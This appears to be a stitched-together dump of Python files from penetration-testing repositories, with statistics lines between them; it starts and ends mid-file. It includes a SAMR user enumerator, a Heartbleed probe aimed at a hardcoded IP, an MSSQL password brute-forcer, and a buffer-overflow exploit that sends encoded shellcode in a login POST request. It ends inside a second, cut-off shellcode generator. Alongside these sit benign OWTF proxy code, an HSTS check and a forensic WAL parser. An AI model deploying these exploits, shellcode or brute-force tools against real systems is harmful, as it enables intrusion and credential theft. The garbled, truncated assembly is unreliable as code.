if resp.get_return_code() != 0 and resp.get_return_code() != 0x105:
raise ListUsersException, 'OpenDomainUsers error'
done = False
while done is False:
for user in resp.get_users().elements():
uname = user.get_name().encode(encoding, 'replace')
uid = user.get_id()
r = rpcsamr.openuser(domain_context_handle, uid)
print "Found user: %s, uid = %d" % (uname, uid)
if r.get_return_code() == 0:
info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info()
entry = (uname, uid, info)
entries.append(entry)
c = rpcsamr.closerequest(r.get_context_handle())
# Do we have more users?
if resp.get_return_code() == 0x105:
resp = rpcsamr.enumusers(domain_context_handle, resp.get_resume_handle())
else:
done = True
except ListUsersException, e:
print "Error listing users: %s" % e
dce.disconnect()
return entries
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
parser = argparse.ArgumentParser()
parser.add_argument('target', action='store', help='[domain/][username[:password]@]<address>')
parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
if domain is None:
domain = ''
dumper = SAMRDump(options.protocol, username, password, domain, options.hashes)
dumper.dump(address)
| 33.596154 | 151 | 0.560806 |
PenetrationTestingScripts | #!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.hello = self.h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
self.hb = self.h2bin('''
18 03 02 00 03
01 40 00
''')
def h2bin(self,x):
return x.replace(' ', '').replace('\n', '').decode('hex')
def recvall(self,s, length, timeout=8):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(self,s):
hdr = self.recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = self.recvall(s, ln, 10)
return typ, ver, pay
def hit_hb(self,s,ip,port):
s.send(self.hb)
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
return False
if typ == 24:
if len(pay) > 3:
self.lock.acquire()
printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.lock.release()
else:
self.lock.acquire()
printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.lock.release()
return True
if typ == 21:
return False
def openssl_test(self,ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((ip, port))
sys.stdout.flush()
s.send(self.hello)
sys.stdout.flush()
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
break
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(self.hb)
self.hit_hb(s,ip,port)
except Exception,e:
#print e
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssl']):
printPink("crack ssl now...")
print "[*] start test openssl_heart %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssl']:
pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssl serice %s" % time.ctime()
print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssl': ['222.22.224.142:443']}
pinglist=['122.225.81.129']
test=ssl_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
| 32.773973 | 136 | 0.495943 |
owtf | """
owtf.transactions.main
~~~~~~~~~~~~~~~~~~~~~~
Inbound Proxy Module developed by Bharadwaj Machiraju (blog.tunnelshade.in) as a part of Google Summer of Code 2013
"""
import glob
import logging
import os
import time
try: # PY3
from urllib.parse import urlparse
except ImportError: # PY2
from urlparse import urlparse
from owtf.transactions.base import HTTPTransaction
from owtf.lib.owtf_process import OWTFProcess
from owtf.models.target import Target
from owtf.managers.target import get_all_in_scope, target_manager
from owtf.managers.transaction import log_transactions_from_logger
from owtf.proxy.cache_handler import request_from_cache, response_from_cache
from owtf.settings import INBOUND_PROXY_CACHE_DIR
from owtf.utils.timer import Timer
class TransactionLogger(OWTFProcess):
"""
This transaction logging process is started separately from tornado proxy
This logger checks for \*.rd files in cache_dir and saves it as owtf db
transaction, \*.rd files serve as a message that the file corresponding
to the hash is ready to be converted.
"""
def initialize(self, **kwargs):
self.logger.disable_console_logging()
def derive_target_for_transaction(self, request, response, target_list, host_list):
"""Get the target and target ID for transaction
:param request: Proxy request
:type request:
:param response: Proxy response
:type response:
:param target_list: The target list for the transaction
:type target_list: `list`
:param host_list: The list of hosts for the transaction
:type host_list: `list`
:return:
:rtype: `list`
"""
for target_id, target in target_list:
if request.url.startswith(target):
return [target_id, True]
elif target in request.url:
return [target_id, self.get_scope_for_url(request.url, host_list)]
elif response.headers.get("Referer", None) and response.headers["Referer"].startswith(target):
return [target_id, self.get_scope_for_url(request.url, host_list)]
# This check must be at the last
elif urlparse(request.url).hostname == urlparse(target).hostname:
return [target_id, True]
return [target_manager.get_target_id, self.get_scope_for_url(request.url, host_list)]
def get_scope_for_url(self, url, host_list):
"""Check the scope for the url in the transaction
:param url: URL to inspect
:type url: `str`
:param host_list: The list of hosts associated
:type host_list: `list`
:return: True if in scope, else False
:rtype: `bool`
"""
return urlparse(url).hostname in host_list
def get_owtf_transactions(self, hash_list):
"""Get the proxy transactions from the cache
:param hash_list: The hash list to fetch from cache
:type hash_list: `list`
:return: A dictionary of all requested transactions
:rtype: `dict`
"""
transactions_dict = None
target_list = Target.get_indexed(self.session)
if target_list: # If there are no targets in db, where are we going to add. OMG
transactions_dict = {}
host_list = get_all_in_scope("host_name")
for request_hash in hash_list:
request = request_from_cache(os.path.join(INBOUND_PROXY_CACHE_DIR, request_hash))
response = response_from_cache(os.path.join(INBOUND_PROXY_CACHE_DIR, request_hash))
target_id, request.in_scope = self.derive_target_for_transaction(
request, response, target_list, host_list
)
owtf_transaction = HTTPTransaction(Timer())
owtf_transaction.import_proxy_req_resp(request, response)
try:
transactions_dict[target_id].append(owtf_transaction)
except KeyError:
transactions_dict[target_id] = [owtf_transaction]
return transactions_dict
def get_hash_list(self, cache_dir):
"""Returns the hash list from cache directory
:param cache_dir: The path to the cache directory
:type cache_dir: `str`
:return: List of hashes
:rtype: `list`
"""
hash_list = []
for file_path in glob.glob(os.path.join(cache_dir, "*.rd")):
request_hash = os.path.basename(file_path)[:-3]
hash_list.append(request_hash)
os.remove(file_path)
return hash_list
def pseudo_run(self):
"""The run function which fetches the transactions from the cache asynchronously
:return: None
:rtype: None
"""
try:
while self.poison_q.empty():
if glob.glob(os.path.join(INBOUND_PROXY_CACHE_DIR, "*.rd")):
hash_list = self.get_hash_list(INBOUND_PROXY_CACHE_DIR)
transactions_dict = self.get_owtf_transactions(hash_list)
if transactions_dict: # Make sure you do not have None
log_transactions_from_logger(transactions_dict)
else:
time.sleep(2)
except KeyboardInterrupt:
exit(-1)
def start_transaction_logger():
try:
transaction_logger = TransactionLogger(cache_dir=INBOUND_PROXY_CACHE_DIR)
transaction_logger.initialize()
logging.debug("Starting transaction logger process")
transaction_logger.start()
except Exception as exc:
logging.debug(str(exc))
pass
| 37.80137 | 115 | 0.623588 |
cybersecurity-penetration-testing | import binascii
import logging
import os
import re
import struct
from collections import namedtuple
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = '''This scripts processes SQLite "Write Ahead Logs" and extracts database entries that may
contain deleted records or records that have not yet been added to the main database.'''
def main(wal_file, **kwargs):
"""
The main function parses the header of the input file and identifies the WAL file. It then splits the file into
the appropriate frames and send them for processing. After processing, if applicable, the regular expression
modules are ran. Finally the raw data output is written to a CSV file.
:param wal_file: Wal File to parse
:return: Nothing.
"""
wal_attributes = {'size': os.path.getsize(wal_file), 'header': {}, 'frames': {}}
with open(wal_file, 'rb') as wal:
# Parse 32-byte WAL header.
header = wal.read(32)
# If file is less than 32 bytes long: exit wal_crawler.
try:
wal_attributes['header'] = dictHelper(header, '>4s7i', namedtuple('struct',
'magic format pagesize checkpoint '
'salt1 salt2 checksum1 checksum2'))
except struct.error, e:
logging.error('STRUCT ERROR for {}:{}'.format(wal_file, e.message))
raise TypeError
# Do not proceed in the program if the input file is not a WAL file.
magic_hex = binascii.hexlify(wal_attributes['header']['magic'])
if magic_hex != "377f0682" and magic_hex != "377f0683":
logging.error('Magic mismatch, expected 0x377f0682 or 0x377f0683 | received {} from {}'.format(
magic_hex, wal_file))
print '[-] File {} does not have appropriate signature for WAL file. Exiting...'.format(wal_file)
raise TypeError
# Calculate number of frames.
frames = (wal_attributes['size'] - 32) / (wal_attributes['header']['pagesize'] + 24)
# Parse frames in WAL file. Create progress bar using trange(frames) which is an alias for tqdm(xrange(frames)).
for x in xrange(frames):
# Parse 24-byte WAL frame header.
wal_attributes['frames'][x] = {}
frame_header = wal.read(24)
wal_attributes['frames'][x]['header'] = dictHelper(frame_header, '>6i', namedtuple('struct',
'pagenumber commit salt1'
' salt2 checksum1'
' checksum2'))
# Parse pagesize WAL frame if B-Tree table-leaf (0x0d).
frame = wal.read(wal_attributes['header']['pagesize'])
if binascii.hexlify(frame[0:1]) == '0d':
frameParser(wal_attributes, x, frame)
else:
wal_attributes['frames'][x]['cells'] = None
continue
# Write WAL data to CSV file.
headers = ['File', 'Frame', 'Salt-1', 'Salt-2', 'Frame Offset', 'Cell', 'Cell Offset', 'ROWID', 'Data']
results = []
for frame in wal_attributes['frames']:
if wal_attributes['frames'][frame]['cells'] is not None:
for cell in wal_attributes['frames'][frame]['cells']:
if 'data' in wal_attributes['frames'][frame]['cells'][cell].keys() and len(wal_attributes['frames'][frame]['cells'][cell]['data']) > 0:
frame_offset = 32 + (frame * wal_attributes['header']['pagesize']) + (frame * 24)
cell_offset = frame_offset + 24 + wal_attributes['frames'][frame]['cells'][cell]['offset']
results.append({'File': wal_file, 'Frame': frame,
'Salt-1': wal_attributes['frames'][frame]['header']['salt1'],
'Salt-2': wal_attributes['frames'][frame]['header']['salt2'],
'Frame Offset': frame_offset,
'Cell': cell, 'Cell Offset': cell_offset,
'ROWID': wal_attributes['frames'][frame]['cells'][cell]['rowid'],
'Data': wal_attributes['frames'][frame]['cells'][cell]['data']})
return results, headers
def frameParser(wal_dict, x, frame):
"""
The frameParser function processes WAL frames.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
# Parse 8-byte WAL page header
page_header = frame[0:8]
wal_dict['frames'][x]['page_header'] = dictHelper(page_header, '>b3hb', namedtuple('struct',
'type freeblocks cells offset'
' fragments'))
# Only want to parse 0x0D B-Tree Leaf Cells
if wal_dict['frames'][x]['page_header']['type'] != 13:
logging.info('Found a non-Leaf Cell in frame {}. Popping frame from dictionary'.format(x))
wal_dict['frames'].pop(x)
return
# Parse offsets for "X" cells
cells = wal_dict['frames'][x]['page_header']['cells']
wal_dict['frames'][x]['cells'] = {}
for y in xrange(cells):
start = 8 + (y * 2)
wal_dict['frames'][x]['cells'][y] = {}
wal_dict['frames'][x]['cells'][y] = dictHelper(frame[start: start + 2], '>h', namedtuple('struct', 'offset'))
# Parse cell content
cellParser(wal_dict, x, y, frame)
def cellParser(wal_dict, x, y, frame):
"""
The cellParser function processes WAL cells.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param y: An integer specifying the current cell.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
index = 0
# Create alias to cell_root to shorten navigating the WAL dictionary structure.
cell_root = wal_dict['frames'][x]['cells'][y]
cell_offset = cell_root['offset']
# Parse the payload length and rowID Varints.
try:
payload_len, index_a = singleVarint(frame[cell_offset:cell_offset + 9])
row_id, index_b = singleVarint(frame[cell_offset + index_a: cell_offset + index_a + 9])
except ValueError:
logging.warn('Found a potential three-byte or greater varint in cell {} from frame {}'.format(y, x))
return
# Update the index. Following the payload length and rowID is the 1-byte header length.
cell_root['payloadlength'] = payload_len
cell_root['rowid'] = row_id
index += index_a + index_b
cell_root['headerlength'] = struct.unpack('>b', frame[cell_offset + index: cell_offset + index + 1])[0]
# Update the index with the 1-byte header length. Next process each Varint in "headerlength" - 1 bytes.
index += 1
try:
types, index_a = multiVarint(frame[cell_offset + index:cell_offset+index+cell_root['headerlength']-1])
except ValueError:
logging.warn('Found a potential three-byte or greater varint in cell {} from frame {}'.format(y, x))
return
cell_root['types'] = types
index += index_a
# Immediately following the end of the Varint headers begins the actual data described by the headers.
# Process them using the typeHelper function.
diff = cell_root['payloadlength'] - cell_root['headerlength']
cell_root['types'] = types
cell_root['data'] = typeHelper(cell_root['types'], frame[cell_offset + index: cell_offset + index + diff])
def dictHelper(data, format, keys):
"""
The dictHelper function creates an OrderedDictionary from a struct tuple.
:param data: The data to be processed with struct.
:param format: The struct format string.
:param keys: A string of the keys for the values in the struct tuple.
:return: An OrderedDictionary with descriptive keys of struct-parsed values.
"""
return keys._asdict(keys._make(struct.unpack(format, data)))
def singleVarint(data, index=0):
"""
The singleVarint function processes a Varint and returns the length of that Varint.
:param data: The data containing the Varint (maximum of 9 bytes in length as that is the maximum size of a Varint).
:param index: The current index within the data.
:return: varint, the processed varint value,
and index which is used to identify how long the Varint was.
"""
# If the decimal value is => 128 -- then first bit is set and need to process next byte.
if ord(data[index:index+1]) >= 128:
# Check if there is a three or more byte varint
if ord(data[index + 1: index + 2]) >= 128:
raise ValueError
varint = (ord(data[index:index+1]) - 128) * 128 + ord(data[index + 1: index + 2])
index += 2
return varint, index
# If the decimal value is < 128 -- then first bit is not set and is the only byte of the Varint.
else:
varint = ord(data[index:index+1])
index += 1
return varint, index
def multiVarint(data):
"""
The multiVarint function is similar to the singleVarint function. The difference is that it takes a
range of data and finds all Varints within it.
:param data: The data containing the Varints.
:return: varints, a list containing the processed varint values,
and index which is used to identify how long the Varints were.
"""
varints = []
index = 0
# Loop forever until all Varints are found by repeatedly calling singleVarint.
while len(data) != 0:
varint, index_a = singleVarint(data)
varints.append(varint)
index += index_a
# Shorten data to exclude the most recent Varint.
data = data[index_a:]
return varints, index
def typeHelper(types, data):
"""
The typeHelper function decodes the serial type of the Varints in the WAL file.
:param types: The processed values of the Varints.
:param data: The raw data in the cell that needs to be properly decoded via its varint values.
:return: cell_data, a list of the processed data.
"""
cell_data = []
index = 0
# Value of type dictates how the data should be processed. See serial type table in chapter
# for list of possible values.
for t in types:
if t == 0:
cell_data.append('NULL (RowId?)')
elif t == 1:
try:
cell_data.append(struct.unpack('>b', data[index:index + 1])[0])
except struct.error:
raise TypeError
index += 1
elif t == 2:
try:
cell_data.append(struct.unpack('>h', data[index:index + 2])[0])
except struct.error:
raise TypeError
index += 2
elif t == 3:
# Struct does not support 24-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 3]), 16))
index += 3
elif t == 4:
try:
cell_data.append(struct.unpack('>i', data[index:index + 4])[0])
except struct.error:
raise TypeError
index += 4
elif t == 5:
# Struct does not support 48-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 6]), 16))
index += 6
elif t == 6:
try:
cell_data.append(struct.unpack('>q', data[index:index + 8])[0])
except struct.error:
raise TypeError
index += 8
elif t == 7:
try:
cell_data.append(struct.unpack('>d', data[index:index + 8])[0])
except struct.error:
raise TypeError
index += 8
# Type 8 == Constant 0 and Type 9 == Constant 1. Neither of these take up space in the actual data.
elif t == 8:
cell_data.append(0)
elif t == 9:
cell_data.append(1)
# Types 10 and 11 are reserved and currently not implemented.
elif t >= 12 and t % 2 == 0:
b_length = (t - 12) / 2
cell_data.append(data[index:index + b_length])
index += b_length
elif t >= 13 and t % 2 == 1:
s_length = (t - 13) / 2
cell_data.append(data[index:index + s_length])
index += s_length
else:
msg = 'Unexpected serial type: {}'.format(t)
print '[-]', msg
logging.error(msg)
raise TypeError
return cell_data
def regularSearch(data, reg_exp, custom_exp):
"""
The regularSearch function performs either default regular expression searches for personal information
or custom searches based on a supplied regular expression string.
:param data: The dictionary containing the parsed WAL file.
:param reg_exp: Boolean, if True will initialize default regular expressions.
:param custom_exp: String to use as regular expression
:return: Nothing.
"""
regexp = {}
if custom_exp is not None:
regexp['Custom'] = custom_exp
if reg_exp is not None:
regexp['Visa Credit Card'] = r'^4\d{3}([\ \-]?)\d{4}\1\d{4}\1\d{4}$'
regexp['SSN'] = r'^\d{3}-\d{2}-\d{4}$'
regexp['Phone Number'] = r'^\d{3}([\ \. \-]?)\d{3}\1\d{4}$'
regexp['URL'] = r"(http[s]?://)|(www.)(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+"
regexp['IP Address'] = r'^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$'
# Must compile each regular expression before seeing if any data "matches" it.
for exp in regexp.keys():
reg_exp = re.compile(regexp[exp])
for frame in data['frames']:
for cell in data['frames'][frame]['cells']:
for datum in xrange(len(data['frames'][frame]['cells'][cell]['data'])):
# TypeError will occur for non-string objects such as integers.
try:
match = reg_exp.match(data['frames'][frame]['cells'][cell]['data'][datum])
except TypeError:
continue
# Print any successful match to user.
if match:
msg = '{}: {}'.format(exp, data['frames'][frame]['cells'][cell]['data'][datum])
print '[*]', msg
| 42.478006 | 151 | 0.567555 |
Hands-On-Penetration-Testing-with-Python | import requests
class Detect_HSTS():
def __init__(self,target):
self.target=target
def start(self):
try:
resp=requests.get(self.target)
headers=resp.headers
print ("\n\nHeaders set are : \n" )
for k,v in headers.iteritems():
print(k+":"+v)
if "Strict-Transport-Security" in headers.keys():
print("\n\nHSTS Header present")
else:
print("\n\nStrict-Transport-Security is missing ! ")
except Exception as ex:
print("EXception caught : " +str(ex))
obj=Detect_HSTS("http://192.168.250.1/dvwa")
obj.start()
| 19.37037 | 56 | 0.653916 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
buf = ""
buf += "\xda\xd8\xd9\x74\x24\xf4\xba\xc2\xd2\xd2\x3c\x5e\x29"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x94\xc1\x30"
buf += "\xc9\xe4\x0e\x36\x32\x14\xcf\x57\xba\xf1\xfe\x57\xd8"
buf += "\x72\x50\x68\xaa\xd6\x5d\x03\xfe\xc2\xd6\x61\xd7\xe5"
buf += "\x5f\xcf\x01\xc8\x60\x7c\x71\x4b\xe3\x7f\xa6\xab\xda"
buf += "\x4f\xbb\xaa\x1b\xad\x36\xfe\xf4\xb9\xe5\xee\x71\xf7"
buf += "\x35\x85\xca\x19\x3e\x7a\x9a\x18\x6f\x2d\x90\x42\xaf"
buf += "\xcc\x75\xff\xe6\xd6\x9a\x3a\xb0\x6d\x68\xb0\x43\xa7"
buf += "\xa0\x39\xef\x86\x0c\xc8\xf1\xcf\xab\x33\x84\x39\xc8"
buf += "\xce\x9f\xfe\xb2\x14\x15\xe4\x15\xde\x8d\xc0\xa4\x33"
buf += "\x4b\x83\xab\xf8\x1f\xcb\xaf\xff\xcc\x60\xcb\x74\xf3"
buf += "\xa6\x5d\xce\xd0\x62\x05\x94\x79\x33\xe3\x7b\x85\x23"
buf += "\x4c\x23\x23\x28\x61\x30\x5e\x73\xee\xf5\x53\x8b\xee"
buf += "\x91\xe4\xf8\xdc\x3e\x5f\x96\x6c\xb6\x79\x61\x92\xed"
buf += "\x3e\xfd\x6d\x0e\x3f\xd4\xa9\x5a\x6f\x4e\x1b\xe3\xe4"
buf += "\x8e\xa4\x36\x90\x86\x03\xe9\x87\x6b\xf3\x59\x08\xc3"
buf += "\x9c\xb3\x87\x3c\xbc\xbb\x4d\x55\x55\x46\x6e\x49\x47"
buf += "\xcf\x88\x03\x97\x86\x03\xbb\x55\xfd\x9b\x5c\xa5\xd7"
buf += "\xb3\xca\xee\x31\x03\xf5\xee\x17\x23\x61\x65\x74\xf7"
buf += "\x90\x7a\x51\x5f\xc5\xed\x2f\x0e\xa4\x8c\x30\x1b\x5e"
buf += "\x2c\xa2\xc0\x9e\x3b\xdf\x5e\xc9\x6c\x11\x97\x9f\x80"
buf += "\x08\x01\xbd\x58\xcc\x6a\x05\x87\x2d\x74\x84\x4a\x09"
buf += "\x52\x96\x92\x92\xde\xc2\x4a\xc5\x88\xbc\x2c\xbf\x7a"
buf += "\x16\xe7\x6c\xd5\xfe\x7e\x5f\xe6\x78\x7f\x8a\x90\x64"
buf += "\xce\x63\xe5\x9b\xff\xe3\xe1\xe4\x1d\x94\x0e\x3f\xa6"
buf += "\xa4\x44\x1d\x8f\x2c\x01\xf4\x8d\x30\xb2\x23\xd1\x4c"
buf += "\x31\xc1\xaa\xaa\x29\xa0\xaf\xf7\xed\x59\xc2\x68\x98"
buf += "\x5d\x71\x88\x89"
junk = 'A'*780
eip = '\x83\x0c\x09\x10'
nops = '\x90'*20
injection = junk + eip + nops + buf
payload="username="+injection+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.129.128\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r 2;n"
buffer+="Referer: http://192.168.129.128/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(payload))+"\r\n"
buffer+="\r\n"
buffer+=payload
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(buffer)
s.close()
| 41.898305 | 94 | 0.677075 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import pymssql
class mssql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mssql.conf")
def mssql_connect(self,ip,username,password,port):
crack =0
try:
db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password)
if db:
crack=1
db.close()
except Exception, e:
self.lock.acquire()
print "%s sql service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def mssq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=mssql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack sql serice now...")
print "[*] start crack sql serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mssql']:
pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack sql serice %s" % time.ctime()
print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
| 32.617647 | 127 | 0.514661 |
owtf | """
owtf.proxy.gen_cert
~~~~~~~~~~~~~~~~~~~
Inbound Proxy Module developed by Bharadwaj Machiraju (blog.tunnelshade.in) as a part of Google Summer of Code 2013
"""
import hashlib
import os
import re
from OpenSSL import crypto
from owtf.lib.filelock import FileLock
from owtf.utils.strings import utf8
def gen_signed_cert(domain, ca_crt, ca_key, ca_pass, certs_folder):
""" This function takes a domain name as a parameter and then creates a certificate and key with the
domain name(replacing dots by underscores), finally signing the certificate using specified CA and
returns the path of key and cert files. If you are yet to generate a CA then check the top comments
:param domain: domain for the cert
:type domain: `str`
:param ca_crt: ca.crt file path
:type ca_crt: `str`
:param ca_key: ca.key file path
:type ca_key: `str`
:param ca_pass: Password for the certificate
:type ca_pass: `str`
:param certs_folder:
:type certs_folder: `str`
:return: Key and cert path
:rtype: `str`
"""
key_path = os.path.join(
certs_folder, re.sub("[^-0-9a-zA-Z_]", "_", domain) + ".key"
)
cert_path = os.path.join(
certs_folder, re.sub("[^-0-9a-zA-Z_]", "_", domain) + ".crt"
)
# The first conditions checks if file exists, and does nothing if true
# If file doesn't exist lock is obtained for writing (Other processes in race must wait)
# After obtaining lock another check to handle race conditions gracefully
if os.path.exists(key_path) and os.path.exists(cert_path):
pass
else:
with FileLock(cert_path, timeout=2):
# Check happens if the certificate and key pair already exists for a domain
if os.path.exists(key_path) and os.path.exists(cert_path):
pass
else:
# Serial Generation - Serial number must be unique for each certificate,
# so serial is generated based on domain name
md5_hash = hashlib.md5()
md5_hash.update(utf8(domain))
serial = int(md5_hash.hexdigest(), 36)
# The CA stuff is loaded from the same folder as this script
ca_cert = crypto.load_certificate(
crypto.FILETYPE_PEM, open(ca_crt, "rb").read()
)
# The last parameter is the password for your CA key file
ca_key = crypto.load_privatekey(
crypto.FILETYPE_PEM,
open(ca_key, "rb").read(),
passphrase=utf8(ca_pass),
)
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 4096)
cert = crypto.X509()
cert.get_subject().C = "US"
cert.get_subject().ST = "Pwnland"
cert.get_subject().L = "127.0.0.1"
cert.get_subject().O = "OWTF"
cert.get_subject().OU = "Inbound-Proxy"
cert.get_subject().CN = domain
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
cert.set_serial_number(serial)
cert.set_issuer(ca_cert.get_subject())
cert.set_pubkey(key)
cert.sign(ca_key, "sha256")
# The key and cert files are dumped and their paths are returned
with open(key_path, "wb") as domain_key:
domain_key.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
with open(cert_path, "wb") as domain_cert:
domain_cert.write(
crypto.dump_certificate(crypto.FILETYPE_PEM, cert)
)
return key_path, cert_path
| 38.092784 | 115 | 0.5732 |
owtf | """
owtf.models.user_login_token
~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Column, Integer, String, ForeignKey, DateTime, UniqueConstraint
from owtf.db.model_base import Model
import uuid
from datetime import datetime, timedelta
from owtf.settings import JWT_EXP_DELTA_SECONDS
from owtf.models.user import User
class UserLoginToken(Model):
__tablename__ = "user_login_tokens"
id = Column(Integer, primary_key=True, autoincrement=True)
user_id = Column(Integer, ForeignKey(User.id))
token = Column(String, nullable=False)
@classmethod
def find_by_userid_and_token(cls, session, user_id, token):
"""Find a api_token by user_id and token
Returns None if not found.
"""
return session.query(UserLoginToken).filter_by(user_id=user_id, token=token).first()
@classmethod
def add_user_login_token(cls, session, token, user_id):
"""Adds an user_login_token to the DB"""
new_token = cls(user_id=user_id, token=token.decode("ascii"))
session.add(new_token)
session.commit()
@classmethod
def delete_user_login_token(cls, session, token):
"""Delete the user_login_token from the DB"""
token_obj = session.query(cls).filter_by(token=token).first()
if token_obj is not None:
session.delete(token_obj)
session.commit()
| 31.5 | 92 | 0.66349 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
#IT must be noted that return address is $rsp
#00007fffffffde30
return_address = '\xe0\xdd\xff\xff\xff\x7f\x00\x00'
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
